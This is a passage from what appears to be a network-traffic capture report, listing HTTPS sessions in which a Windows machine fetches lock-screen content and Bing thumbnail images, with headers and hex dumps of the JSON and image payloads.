Xh1sE71Acqb6Tur/f6CvIuSR+isV8ykDFvwZtXvRFBCzSpFdm5q0uXYPvJB8bd6wT6xJ6QtIxKxFWypKPUYXFdnvCLb5v5FxoocP8foAgpqk231am8Y/TM+JYyN6V9LvV215wI0Z+oUjq7xojOZeFqv/P8S7sN82fb+SPTsi5+3HD/jgTvfp37yQEjEuGRiIJ9I1ivcQoWli3A7EpkszyeR6bs7sRxOhScp9AAhlCAFqyIIEZyhMmGu5swmT6TkpojM9pAGdIHH/kvcbTylXAaEbHIqHdro+X3YUfeb0tcB&p= Cache-Control: no-cache MS-CV: KV23mrU2tE2b7UBv.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-23 06:09:23 UTC	815	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 23654 Content-Type: application/json; charset=utf-8 Expires: -1 Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [] X-ARC-SIG: WcLwlsZQzqH1odkttKgb+odeibQ7FXgnKASq/b4ehYQB/ValZVimWlItbYcuKjScoFXInNGWt/Td1B6z2FSxFaQMEKa8zHpTjsnIDjcxJ8qhC8lJjJYL4w3dHUJcBUYOkM78Il/OZM6lHyK/TYGp+C8datBshOXp6G+jfK+u40OTb8cvI7rCLD2uMgJx/t/LcXDQ/CShHKYavpYQ7w1KJcQf8lTl0mTNREJ3McAoa6sm59/a027PDvOhbH4L3iEGGN8G7JkuCXZ2rNO7Od3oywIkZtepEAcCPcPb/Kip42cyGzqC7VFMhUBjKnPOjDex2MsddXAc9RMvoZVNQO5I+g== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Sat, 23 Nov 2024 06:09:22 GMT Connection: close
2024-11-23 06:09:23 UTC	15569	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 6e 61 6d 65 5c 22 3a 5c 22 4c 6f 63 6b 53 63 72 65 65 6e 5c 22 2c 5c 22 70 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6c 61 6e 64 73 63 61 70 65 49 6d 61 67 65 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 69 6d 61 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"name\":\"LockScreen\",\"propertyManifest\":{\"landscapeImage\":{\"type\":\"ima
2024-11-23 06:09:23 UTC	8085	IN	Data Raw: 3d 32 35 31 39 37 38 35 34 31 5c 5c 75 30 30 32 36 74 69 64 73 3d 31 35 30 30 31 5c 5c 75 30 30 32 36 74 79 70 65 3d 6d 76 5c 5c 75 30 30 32 36 72 65 71 76 65 72 3d 31 2e 30 5c 5c 75 30 30 32 36 54 49 4d 45 3d 7b 44 41 54 45 54 49 4d 45 7d 5c 5c 75 30 30 32 36 61 64 55 6e 69 74 49 64 3d 31 31 37 33 30 35 39 38 5c 5c 75 30 30 32 36 6c 6f 63 61 6c 49 64 3d 77 3a 30 36 38 44 34 38 32 44 2d 38 46 33 42 2d 37 38 41 45 2d 44 41 41 30 2d 30 43 30 38 42 38 46 46 32 41 45 36 5c 5c 75 30 30 32 36 64 65 76 69 63 65 49 64 3d 36 39 36 36 35 35 35 33 32 30 39 31 32 37 33 35 5c 5c 75 30 30 32 36 61 6e 69 64 3d 44 41 31 38 43 38 38 32 35 33 35 36 42 41 43 34 45 37 42 32 33 30 36 36 46 46 46 46 46 46 46 46 5c 22 2c 5c 22 65 69 64 5c 22 3a 7b 5c 22 74 5c 22 3a 5c 22 74 78 Data Ascii: =251978541\\u0026tids=15001\\u0026type=mv\\u0026reqver=1.0\\u0026TIME={DATETIME}\\u0026adUnitId=11730598\\u0026localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6\\u0026deviceId=6966555320912735\\u0026anid=DA18C8825356BAC4E7B23066FFFFFFFF\",\"eid\":{\"t\":\"tx

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49734	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:22 UTC	375	OUT	GET /th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:23 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 586035 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 2D0FE4EF9D8949499FCEB5FDDABF6C63 Ref B: EWR30EDGE0911 Ref C: 2024-11-23T06:09:22Z Date: Sat, 23 Nov 2024 06:09:22 GMT Connection: close
2024-11-23 06:09:23 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 16 5e 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 33 3a 32 36 20 32 32 3a 33 31 3a 32 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 07 80 a0 03 00 04 00 00 00 01 00 00 04 38 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``^ExifMM*bj(1r2i``Adobe Photoshop 24.2 (Windows)2023:03:26 22:31:228
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 25 1b 3f bd 47 b3 17 b4 46 73 45 4d f2 6b 45 63 56 a3 c9 ff 00 38 a9 e5 29 49 33 2d a0 5a 6b 41 5a 6d 1d 31 a2 aa e5 0e 64 65 35 bd 31 a0 ad 56 82 98 d1 51 60 bb 32 fc 8a 46 8a b4 9a 2a 67 93 fe 71 54 49 9b e5 d0 b1 d6 87 91 49 e4 fb 50 67 76 50 58 a9 cb 15 5d f2 7d a9 7c ba a4 89 6c a5 e4 fb 52 79 15 7b cb a1 63 ab e4 64 f3 a2 8a c3 ba 8f 22 b4 3c 9f f3 8a 3c 9f f3 8a 9b 17 72 87 93 ed 4b f6 7a bd e5 a5 39 63 a7 ca c3 99 19 fe 45 3b c9 f7 ab fe 55 31 92 a7 96 5d 07 cc ba 94 5a 0a 4f 27 da b4 3c 9a 66 ca a8 c1 b2 5c 92 dc a5 e4 fb 52 ac 15 79 60 66 ae 4b e2 e5 dc f6 fe 15 bb 86 d6 7f b3 c8 bb 77 bf cd f3 fc bb 95 06 df 5e f5 9c e5 ec d5 d9 a4 23 ed 1a 51 47 37 ab 6a 70 6a da c6 b9 aa 5d 49 23 5a e8 71 35 b6 9d 0a 7f cf 62 bf bc 93 d3 77 f4 af 3d f1 06 b3 Data Ascii: %?GFsEMkEcV8)I3-ZkAZm1de51VQ`2F*gqTIIPgvPX]}\|lRy{cd"<<rKz9cE;U1]ZO'<f\Ry`fKw^#QG7jpj]I#Zq5bw=
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 5b bf 1f b5 ef f8 40 3e 0f 4d 2e 97 22 5b ea 9a 8b ae 9b a7 4d f2 ee 85 9d 7e 79 47 ba a6 ec 7f b5 8a ee 21 d4 2c fe 5f 27 e6 5a f9 4f f6 b6 f8 83 ff 00 09 5f c4 e5 d1 f4 df 9b 4d f0 d6 eb 68 a6 fe 17 bb 3f eb 9b fd ac 7d c0 7e b5 e1 d6 c4 62 31 75 2f 53 e1 5d 0f a0 a3 85 c3 e0 a8 fe ef e2 7a 5f a9 e3 7a 94 b6 7f 6e b1 b3 b7 48 ed 7e cf b9 9f e7 fd ff 00 1d 0b b7 3f c5 b6 b8 ff 00 15 5f cb 7b f2 b5 fc 8c d7 09 fb e4 d8 df 26 7f 87 af 7a bd 75 73 3a dd 6b 97 90 c6 92 ac 49 0d b4 3b ff 00 8d b9 66 ff 00 74 d6 05 bb 79 ba c4 31 d9 c7 f2 ab ee 74 77 dc c8 c3 b7 e1 eb 5d 51 ea fa 9c 52 7b 5c d9 df 05 9e 95 0a c9 1f cc a8 bf 73 6a af 15 93 75 1d 8b c8 f0 db c9 26 dd fe 56 ff 00 ee 65 be 5d b5 a9 e2 29 5b fd 1e dd 63 db f3 f9 5f 26 ef 93 1f de ff 00 eb d6 3d f4 Data Ascii: [@>M."[M~yG!,_'ZO_Mh?}~b1u/S]z_znH~?_{&zus:kI;fty1tw]QR{\sju&Ve])[c_&=
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 6f 12 28 f4 28 96 4d df c5 55 f5 8f 0f f9 b0 6d 8f e5 6a d5 fb 5b 34 9f 37 de 5f bf 56 23 b8 57 93 6a fc d5 9a ad 5a 2d 3b 9a 3c 3d 19 2b 58 e0 6e b4 ab c8 24 f2 e4 8e 36 8f fb ef 55 6e 34 2d b2 79 96 b2 6e 6f e0 4f ee 57 71 ac 59 45 71 03 ac 9f 37 fb 95 cb df 59 5c d9 49 ba de 49 1a 3f ee 57 a5 43 15 29 ad ec cf 2f 11 83 8c 3a 5d 19 ba 86 a1 a8 5a ec 59 24 93 e5 ff 00 62 99 1e a7 7c df 32 c1 b9 5a b7 6d cc ef 1e e9 a3 8f 77 f7 1e a6 8f 4f 55 91 e4 58 fe 5f ee 25 69 ed e9 ad 1c 51 9f d5 ea 4b 58 cd d8 c9 b7 bf 9e e3 62 f9 6f ba ac 43 15 dc f7 5b 7f 78 b5 a9 67 6f 04 51 f9 7f 76 a6 f3 76 7f cb 4d d5 84 ab 2d 79 51 d1 1c 3c ac b9 e4 55 68 22 ff 00 57 37 cb fe c5 58 8e cf 64 7e 5f f0 ff 00 05 43 75 a8 44 91 f9 9e 44 92 b5 5e b3 bc 8a e2 34 db 1d 63 2e 7b 1d Data Ascii: o((MUmj[47_V#WjZ-;<=+Xn$6Un4-ynoOWqYEq7Y\II?WC)/:]ZY$b\|2ZmwOUX_%iQKXboC[xgoQvvM-yQ<Uh"W7Xd~_CuDD^4c.{
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: da 93 15 2a c7 ba 9d 1c 74 0a e5 bd 0e 77 82 4f 2c fc d0 b7 df 4a 7d e4 bf bb dd f3 fc d4 59 db ed 93 77 fd f1 53 5d 5b 4a d3 ee f3 3e 5d 9b a1 fe ef 1f c3 55 06 d1 94 a2 9b b9 9b 74 ed bd 77 7c cd fd fa 7b 3c be 4f 97 f2 2a fd ed f5 25 f4 9f bc f9 60 4f 2f fb 95 0c 9b 76 6e 5f e2 4a bd de 80 ba 10 29 db b5 8f de a1 bc af ef fd df f6 3e fd 1e 66 e8 76 ec 4a 62 bb 6e a9 34 19 bf f7 9f 7e 89 0b 3f cd ff 00 7d d2 7f 1b 53 94 2e fd cd f2 d2 34 1f e5 37 f7 1d aa 19 03 8f 95 7e 66 ff 00 c7 ab 52 d5 17 63 b4 4f b7 6a 7f 07 f7 a8 90 44 b3 f9 8d e6 4b fe df fb 54 4b 62 23 27 73 2d 61 69 24 58 e5 fe 2a d6 86 d9 52 7f 97 e5 6f 97 67 f5 aa 4d 13 7d bb cc f2 f7 2b 7f 05 4f 1c 53 f9 8f 22 fd d5 db bf f1 ac f9 b9 47 25 cc b4 64 77 d6 d2 79 9f ea d3 6f f0 d5 16 57 1c b7 Data Ascii: twO,J}YwS][J>]Utw\|{<O%`O/vn_J)>fvJbn4~?}S.47~fRcOjDKTKb#'s-ai$X*RogM}+OS"G%dwyoW
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 7e 68 df 6b 56 12 de c7 4a 6e c5 9d 48 59 ff 00 69 4d f6 3d eb 0e ff 00 93 f8 aa 1d 4a 75 9f 6a ec f9 97 f8 e9 93 15 df f2 fd ea 6f cd fe fd 27 2b 2b 0d 2b bb 89 95 fe 2a 7d af d8 fc c6 fb 44 13 4a bf ec 4d b7 fa 54 3b 5b ef 7e f3 75 3a 31 b7 77 ef 2a 23 b9 4f 61 de 5c 73 cc ab 0a 49 e7 33 fd c4 4d db ff 00 2a 7f da a7 16 2b 0f f0 fd da 89 9e 4f 31 5a 39 3e ef f1 a7 cb 4f 93 6b da 2e dd fb 97 ef fc ff 00 2d 5d 9a 07 67 6b 92 58 95 43 ba 4d f2 2a ff 00 72 b4 2c ef 16 08 5f e4 f2 e4 fe e5 65 2b f9 5f ea dd e3 ff 00 6e a5 f3 e4 7d db 91 1a 46 75 f9 e5 aa 56 44 4a 2d 9a bb 67 ba d3 66 58 7e 6d af e6 6c 4f ee d4 3a b2 ec b5 b5 b8 5f 2f e6 f9 76 7f 17 cb eb 59 2a f2 5b bb 34 6f b7 fe 07 4d 69 65 9f e4 67 db 47 32 b5 ad a8 95 39 5d 3b e8 6d c3 3e 9e ba 77 98 c8 Data Ascii: ~hkVJnHYiM=Jujo'+++}DJMT;[~u:1w#Oa\sI3M+O1Z9>Ok.-]gkXCMr,_e+_n}FuVDJ-gfX~mlO:_/vY*[4oMiegG29];m>w
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 6a b7 29 e2 3b eb 8b 7f 3e e2 48 91 62 9a ef c8 56 64 63 1e 5c 6d 7c f4 df f2 ee fb ad f4 5a cd f0 ac 16 32 eb 16 33 79 f1 da c3 2d c4 6d e7 4d f3 7c bf c5 d7 ef fc be b5 e0 d3 76 5a ec 7b 38 8b c9 b3 eb 1f 06 dc e9 f7 1e 19 b7 92 eb fd 2a de 5f 3a e6 db 67 ef 65 9a 13 f3 19 10 3f ae 24 45 c9 dc 76 ff 00 76 9d 66 90 5c 69 49 ae 5c 58 41 16 ad 2c 32 6a e9 6f 77 ba 2f b3 2f 3e 4b 39 ff 00 61 13 a7 f0 fd 6b 9f f0 6d ce 9f ae 68 f3 47 f6 f8 ed e6 b5 46 82 de dd e7 68 a5 fb 3c 6b b3 cb 55 e0 2b 14 ea 57 f8 5c 9e 95 93 f1 eb c4 2b a9 68 f7 1e 1f b5 93 fe 25 32 fd 9e da ee 6b 79 ff 00 d4 c6 ed fb ce 9f 37 c8 3e 83 2d 5e 65 48 de 7e 67 a7 46 5f bb 48 c5 f8 89 e2 3f b6 da da 68 3a 5c 70 4a aa eb 15 de a8 93 ed 6d d3 a9 7d cb fd f4 0b fc 27 fd 65 50 b5 b7 65 d2 a5 Data Ascii: j);>HbVdc\m\|Z23y-mM\|vZ{8*_:ge?$Evvf\iI\XA,2jow//>K9akmhGFh<kU+W\+h%2ky7>-^eH~gF_H?h:\pJm}'ePe
2024-11-23 06:09:23 UTC	16065	IN	Data Raw: 00 eb 54 57 9e 22 a2 b4 65 63 7a 54 f0 b1 6d b8 df b1 ed ba 2e 99 f0 f6 cb c3 36 fa c7 8e 23 93 43 56 87 6a 5a 5c 5f 79 bf 69 6f ba cf b9 3e e2 f6 c7 ad 49 e2 8f 1f fc 0d d0 6c 61 5d 3f 42 fb 64 8c 8a bb 2e ef a4 95 51 7a 64 ec fe 2e fe f5 e0 fe 34 d4 f5 a9 f4 37 bc d4 ac 27 d3 61 95 15 6d ed ee 1d 56 7d be 9e 58 f9 b6 ff 00 bf 5c 6d c6 a3 1b 46 8a a9 b6 35 4d ae 89 fd da e4 8e 05 cd 73 4a a3 7f 3d 0e b9 e3 9d 36 a1 0a 71 56 f2 d4 fa 67 fe 17 87 c3 ef 22 d3 c9 f0 be 87 6f bb cc 6d ef a5 c9 b9 31 8c 6c e7 f8 9b d6 af db fe d3 3a 35 e6 9d a8 59 df 5a 58 da c7 e4 b2 cb b3 4b db f2 8f bb 8f 4c b5 7c c7 6b a9 5b 1b 7d 2e 3f bc d0 5c 48 db 3f d9 2a 38 e6 9b a3 dc c0 ba c6 b3 e5 c7 1e d6 85 9b 63 bb 2f fc 04 7a b5 29 65 38 79 7c 49 bf 98 47 39 c4 dd d9 db fe 1e Data Ascii: TW"eczTm.6#CVjZ\_yio>Ila]?Bd.Qzd.47'amV}X\mF5MsJ=6qVg"om1l:5YZXKL\|k[}.?\H?*8c/z)e8y\|IG9
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: a7 73 47 34 00 da 29 dc d1 cd 00 1c d0 af 49 8a 5e 6a 5a b8 d3 68 77 98 f4 d6 3b a8 e6 8e 68 e5 43 72 93 dc 39 a3 9a 28 aa 24 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 5c 51 8a 5a 37 7b d4 bb f4 05 61 b4 53 9a 8a 60 d0 98 a4 a7 51 4c 06 d1 cd 3a 9b 40 ac 1c d1 cd 14 50 16 0e 69 31 4b 5c ff 00 c5 8d 65 bc 3b f0 d7 58 d6 23 9f ca 92 de df f7 2f fe d1 6d a0 2f fb 54 e3 17 29 28 ad d9 15 24 a1 07 27 b2 d4 f1 df da a7 e2 ed f6 9f 77 37 83 fc 27 77 1c 4c 9f ba d4 6e e2 fb ce dd e3 56 fe 15 1d fd 4d 7c e5 7d 7b 78 f7 5e 63 4f ba 4f ef d5 fd 42 ee 77 9f ed 13 79 6c d7 0e cd bd 1f f8 8d 56 b8 6b 17 ff 00 59 1e d6 5f ee 7c b5 f6 b8 3c 34 30 d4 d4 62 bd 5f 73 f3 9c 6e 32 a6 32 ab 9c e5 6e cb b2 20 86 f2 f9 7f e5 bc 9b 57 e5 f9 fe 65 45 a8 57 52 79 Data Ascii: sG4)I^jZhw;hCr9($(((((\QZ7{aS`QL:@Pi1K\e;X#/m/T)($'w7'wLnVM\|}{x^cOOBwylVkY_\|<40b_sn22n WeEWRy
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 35 00 b0 48 b7 17 92 40 d6 f0 4c b1 24 d0 ce bb bc cd b9 c2 37 53 85 f4 f9 69 45 d9 23 a6 ad db 4b cb fa fc 8e 37 58 ff 00 48 9d 24 f3 e4 7b 8b 07 99 ae 12 6f f5 4e a7 e7 f3 38 e4 e5 be 41 fd d1 5e 77 e3 4b 85 f2 21 b7 5b b8 e5 55 dd bf 67 bb 7a f7 c5 7a 4f 8a 23 96 0d 72 19 ae ae e7 89 6e bc e6 47 99 3e 6f 2c e1 7e 54 ff 00 7a b8 3f 14 6b 12 da f8 6e 1f 0e d9 c7 a5 45 6e b7 13 4b 71 71 f6 55 69 ef 58 b7 cb ba 46 fb aa 3f d8 ae fa 27 2d 56 93 d4 e2 18 6f 93 f7 7f 7b 7d 49 0a 2c 52 6e 68 e3 dc ce db df ff 00 89 a8 ef 3f 75 70 f6 f2 24 8a cb fd cf bb 55 d6 56 79 fc b5 8f 77 f0 a6 ca be 53 06 cd 6b 70 ad 22 7e f3 ef 6d 67 77 ab 6c fb 7e 5f fb ed eb 1a d6 49 6d f7 ee f2 da 3f bb be b4 2d d9 7c bf dc fc db 7f b9 47 29 25 c9 36 bc 7b 9b cc f2 fe f6 cf e2 aa 32 Data Ascii: 5H@L$7SiE#K7XH${oN8A^wK![UgzzO#rnG>o,~Tz?knEnKqqUiXF?'-Vo{}I,Rnh?up$UVywSkp"~mgwl~_Im?-\|G)%6{2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49729	2.16.158.90	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:22 UTC	367	OUT	GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: www.bing.com Connection: Keep-Alive
2024-11-23 06:09:23 UTC	627	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Type: image/png Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Content-Length: 1107 Date: Sat, 23 Nov 2024 06:09:23 GMT Connection: close Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.b79e1002.1732342163.30c0bda
2024-11-23 06:09:23 UTC	1107	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 03 e8 49 44 41 54 48 4b bd 56 df 6f 54 45 14 9e 7b 79 37 a2 bc 17 2a 7f 82 fa 2c 94 d7 96 1f 09 0f e2 0b d1 44 30 1a c5 42 4b 20 d0 90 00 89 89 3f 23 0b a1 a5 2d 82 b4 90 b4 1a 69 81 6e 63 49 20 41 5e 08 a5 85 85 6e 03 16 24 d8 b4 5d 76 bb eb da 36 e9 9c 73 c6 ef cc bd bb 4b c0 1a 5b 13 6f 72 ee f7 ed cc dd f3 cd f9 e6 cc cd 35 22 c2 ac b7 28 4a 5c f1 6f 79 fc a8 5e ff c4 fd c5 b8 0c 3b e7 e6 af f6 f0 ec b1 bd 3c d7 76 88 e6 da 0e 02 0f 2a 56 78 fb 21 9a 39 b6 87 e5 ee 10 0f 67 7e a4 9e d4 47 9c 1c dd 4d Data Ascii: PNGIHDRw=sRGBgAMAapHYs%%IR$IDATHKVoTE{y7,D0BK ?#-incI A^n$]v6sK[or5"(J\oy^;<vVx!9g~GM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	49732	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:22 UTC	346	OUT	GET /th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-23 06:09:23 UTC	856	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 550329 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 6CF02A5504C74CA4A01FC0A69BEAB713 Ref B: EWR311000108029 Ref C: 2024-11-23T06:09:22Z Date: Sat, 23 Nov 2024 06:09:22 GMT Connection: close
2024-11-23 06:09:23 UTC	15528	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 17 10 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 32 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 30 33 3a 32 36 20 32 32 3a 33 32 3a 31 36 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``ExifMM*bj(1r2i``Adobe Photoshop 24.2 (Windows)2023:03:26 22:32:168
2024-11-23 06:09:23 UTC	16384	IN	Data Raw: 50 dd c3 61 94 da 9b 9a 39 a7 cc 1c a4 34 dd a6 a4 db 44 8b 49 bb 86 c4 75 0d f4 f0 5a 5a c9 75 75 37 97 04 7f f2 d2 9b a8 de 47 69 ff 00 4d 24 93 fd 5c 5e 6d 71 1a 95 cc 9e 20 d4 64 86 7f 3a 4f b3 ca ff 00 bb f2 bf 73 f2 d4 4a 49 3b 75 34 8d 9a bb 33 bc 69 e3 1b fb d8 6e 60 d2 e6 f2 ec 64 93 f7 71 ff 00 cf 4f f6 a8 ac fd 36 ce 3f ec 9b 9b d9 ec e1 b8 92 4d f1 db 5b 79 bf c7 f7 96 45 db fd da 2a 63 05 1b e9 b8 53 e4 9a 7a fe 07 de d1 af f1 d3 a7 68 fc 9d f4 da af 7c df b9 d9 5c b1 dc e9 6a c8 a7 7c db eb 16 7f f5 db 2b 5e e1 6b 3a e9 7f 7d be bb e8 c9 23 82 ac 5b d4 65 bb 53 e4 6a af ba 9d bb de 9c 93 6c 94 d5 87 ef a3 cf d9 51 46 db e9 b2 35 35 14 1c cd 22 7f 3e a5 8e 5d f5 4e a4 4a 53 8a 4b 42 a1 29 5c ba 8d 56 91 aa 94 6d 53 6e ae 39 6e 76 45 59 13 f9 Data Ascii: Pa94DIuZZuu7GiM$\^mq d:OsJI;u43in`dqO6?M[yE*cSzh\|\j\|+^k:}#[eSjlQF55">]NJSKB)\VmSn9nvEY
